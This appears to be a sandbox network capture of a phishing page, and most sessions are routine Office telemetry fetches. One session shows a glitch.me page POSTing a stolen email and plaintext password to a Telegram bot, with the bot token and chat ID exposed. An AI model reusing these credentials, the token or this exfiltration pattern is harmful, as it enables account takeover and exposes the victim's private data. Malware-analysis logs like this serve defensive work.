                                                          2024-12-03 02:28:00 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          63192.168.2.44981913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:00 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:00 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:00 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 479
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                          ETag: "0x8DC582BB7D702D0"
                                                          x-ms-request-id: 6644a72f-f01e-001f-6d66-435dc8000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022800Z-174f784596886s2bhC1EWR743w00000015bg000000009buc
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:00 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          64192.168.2.44981813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:00 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:00 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:00 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 400
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                          ETag: "0x8DC582BB2D62837"
                                                          x-ms-request-id: 203bed18-201e-006e-51a9-42bbe3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022800Z-174f7845968frfdmhC1EWRxxbw00000015a000000000e9y5
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:00 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          65192.168.2.44981713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:00 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:00 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:00 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 404
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                          ETag: "0x8DC582B95C61A3C"
                                                          x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022800Z-174f784596886s2bhC1EWR743w00000015bg000000009bud
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:00 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          66192.168.2.44981613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:00 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:00 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:00 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 468
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                          ETag: "0x8DC582BB046B576"
                                                          x-ms-request-id: cdcb5222-c01e-0014-44bd-42a6a3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022800Z-174f7845968n2hr8hC1EWR9cag00000014wg00000000g3an
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:00 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          67192.168.2.44982334.117.59.81443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:01 UTC337OUTGET /json HTTP/1.1
                                                          Host: ipinfo.io
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:28:02 UTC345INHTTP/1.1 200 OK
                                                          access-control-allow-origin: *
                                                          Content-Length: 321
                                                          content-type: application/json; charset=utf-8
                                                          date: Tue, 03 Dec 2024 02:28:02 GMT
                                                          x-content-type-options: nosniff
                                                          via: 1.1 google
                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-12-03 02:28:02 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          68192.168.2.44982113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:02 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:02 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:02 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 425
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                          ETag: "0x8DC582BBA25094F"
                                                          x-ms-request-id: be2d73de-001e-002b-2f62-4399f2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022802Z-174f7845968glpgnhC1EWR7uec00000015g0000000006zt5
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:02 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          69192.168.2.449822149.154.167.220443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:02 UTC770OUTPOST /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1
                                                          Host: api.telegram.org
                                                          Connection: keep-alive
                                                          Content-Length: 655
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://troubled-worried-bamboo.glitch.me
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:28:02 UTC655OUTData Raw: 63 68 61 74 5f 69 64 3d 31 37 33 39 32 36 39 34 33 34 26 74 65 78 74 3d 2d 2d 2d 2d 2d 2d 2d 2d 25 32 42 2b 4b 49 54 41 2b 52 65 5a 75 6c 54 2b 4e 65 77 2b 59 6f 72 6b 2b 43 69 74 79 2b 4e 65 77 2b 59 6f 72 6b 25 32 43 2b 55 53 2b 25 32 42 2d 2d 2d 2d 2d 2d 2d 2d 25 30 41 45 6d 61 69 6c 2b 25 33 41 2b 74 61 65 6b 79 75 2e 6b 69 6d 25 34 30 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 25 30 41 50 61 73 73 77 6f 72 64 2b 25 33 41 2b 35 54 25 35 44 61 25 37 42 7a 68 30 28 75 25 30 41 43 68 65 63 6b 65 72 25 33 41 2b 74 61 65 6b 79 75 2e 6b 69 6d 25 34 30 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 25 33 41 35 54 25 35 44 61 25 37 42 7a 68 30 28 75 25 30 41 42 72 6f 77 73 65 72 2b 25 33 41 2b 35 2e 30 2b 28 57 69 6e 64 6f 77 73 2b 4e
                                                          Data Ascii: chat_id=1739269434&text=--------%2B+KITA+ReZulT+New+York+City+New+York%2C+US+%2B--------%0AEmail+%3A+taekyu.kim%40hyundaielevator.com%0APassword+%3A+5T%5Da%7Bzh0(u%0AChecker%3A+taekyu.kim%40hyundaielevator.com%3A5T%5Da%7Bzh0(u%0ABrowser+%3A+5.0+(Windows+N
                                                          2024-12-03 02:28:02 UTC389INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 03 Dec 2024 02:28:02 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 1024
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-12-03 02:28:02 UTC1024INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 33 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 35 31 33 30 38 31 33 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 67 62 69 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 70 69 73 61 70 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 33 39 32 36 39 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6f 72 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 5f 6d 6f 6f 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 31 39 32 38 38 32 2c 22 74 65 78 74 22 3a 22 2d 2d 2d
                                                          Data Ascii: {"ok":true,"result":{"message_id":19365,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1733192882,"text":"---


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          70192.168.2.44982513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:02 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:02 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:02 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 448
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                          ETag: "0x8DC582BB389F49B"
                                                          x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022802Z-174f7845968xr5c2hC1EWRd0hn0000000q2g00000000hm16
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:02 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          71192.168.2.44982413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:02 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:02 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:02 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 475
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                          ETag: "0x8DC582BB2BE84FD"
                                                          x-ms-request-id: 20d43c3b-001e-0049-3b6b-435bd5000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022802Z-174f784596886s2bhC1EWR743w00000015bg000000009byv
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:02 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          72192.168.2.44982713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:02 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:03 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:02 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 416
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                          ETag: "0x8DC582BAEA4B445"
                                                          x-ms-request-id: 6da3e3c6-601e-0084-52b4-426b3f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022802Z-174f7845968swgbqhC1EWRmnb400000015f0000000009t01
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
